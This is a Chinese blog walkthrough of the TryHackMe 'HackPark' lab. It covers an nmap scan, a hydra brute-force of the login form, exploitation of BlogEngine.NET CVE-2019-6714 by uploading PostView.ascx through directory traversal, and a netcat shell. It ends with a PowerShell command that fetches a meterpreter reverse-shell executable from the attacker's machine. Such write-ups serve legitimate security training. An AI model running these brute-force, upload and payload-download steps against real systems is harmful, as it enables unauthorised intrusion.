TryHackMe-进攻性渗透测试-03_HackPark

HackPark

循例 nmap 扫,带-Pn参数

┌──(root💀kali)-[/home/sugobet]
└─# nmap 10.10.161.251 -Pn

只开了80和3389

上web看看,

题目提问网站的小丑图片中的小丑叫什么名字
网站上找不到,把图片也下载下载strings看看有没有东西,很遗憾没有

然后通过社交得知,这是一部电影 小丑回魂中的🤡,百度得知名字

Pennywise

在刚刚找名字的时候找到了后台登录页面

题目要求使用hydra爆破

hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
[80][http-post-form] host: 10.10.161.251   login: admin   password: 1qaz2wsx

hydra爆web稍微确实是麻烦了点,直接用burp会更方便

收集到信息:BlogEngine.NET v3.3.6.0

searchsploit BlogEngine.NET

CVE-2019-6714

存在任意文件上传/rce/目录穿越

将payload的ip和port修改为我们的,并且将文件名修改为

PostView.ascx

上传后,netcat开启监听,并访问:

http://10.10.161.251/?theme=../../App_Data/files

成功getshell

题目要求使用metasploit,首先使用msfvenom生成payload

攻击机开启http服务,目标上使用powershell下载payload

powershell -c "wget http://10.11.17.14:8000/windows-tools_and_exp/meterpreter_rev_she11.exe"

msfconsole开启监听

目标上运行:

meterpreter_rev_she11.exe

对windows方面比较差,后面看着别人的wp做…

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值